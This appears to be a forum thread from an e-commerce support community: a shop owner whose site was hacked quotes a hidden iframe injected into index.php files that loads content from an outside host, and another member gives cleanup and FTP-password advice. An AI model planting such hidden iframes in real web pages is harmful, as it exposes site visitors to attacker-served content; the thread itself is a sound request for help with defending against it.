Jump to content

Injection XSS in all index.php


unformatik

Recommended Posts

Hi

My e-commerce site was haked!

this is a sample code

echo'<iframe frameborder="no" style="margin: 0px; padding: 0px; width: 780px; height: 380px;" src="http://www.prestashop.com/rss/news.php?v='._PS_VE
<iframe src="http://[removed]:8080/index.php" width=179 height=174 style="visibility: hidden"></iframe>


may version looks like http://s*.cn:8080/index.php

how to protect the boutique
please help
Link to comment
Share on other sites

Change your ftp passwords for this and any other sites you may have, iframe attack can and will try the same passwords over and over with other sites you may have. search all files with something like notepad ++ for the same code and remove it, (usually index files) but can be any.
and most of all DONT store your ftp username and or pasword on the same pc as your local copy of site. Best to keep perhaps just some of it and remember the other 3 or 4 digits.

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...